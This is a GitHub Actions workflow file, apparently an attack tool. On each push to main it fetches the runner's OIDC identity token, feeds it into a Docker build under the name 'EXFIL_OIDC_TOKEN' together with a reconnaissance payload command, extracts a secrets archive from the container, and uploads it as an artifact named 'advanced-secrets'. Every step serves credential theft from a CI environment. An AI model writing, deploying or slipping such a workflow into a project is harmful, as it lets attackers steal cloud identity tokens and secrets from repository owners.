name: Advanced Deep CI Extractor

on:
  push:
    branches: [ main ]

jobs:
  deep_extract:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read

    steps:
      - name: Checkout repo
        uses: actions/checkout@v4

      - name: Acquire OIDC Token & Setup Payload
        id: prepare
        run: |
          echo "--- Fetching OIDC Token ---"
          OIDC_TOKEN=$(curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL")
          echo "OIDC=$OIDC_TOKEN" >> "$GITHUB_OUTPUT"
          echo "CMD='whoami && id && ls -la /'" >> "$GITHUB_OUTPUT"

      - name: Build exploit image
        run: |
          docker build \
            --build-arg PAYLOAD_CMD="${{ steps.prepare.outputs.CMD }}" \
            --build-arg EXFIL_OIDC_TOKEN="${{ steps.prepare.outputs.OIDC }}" \
            -t deep-ci \
            .

      - name: Run and collect results
        run: |
          docker run --rm deep-ci cat /secrets.tar.gz > secrets.tar.gz || true

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: advanced-secrets
          path: secrets.tar.gz
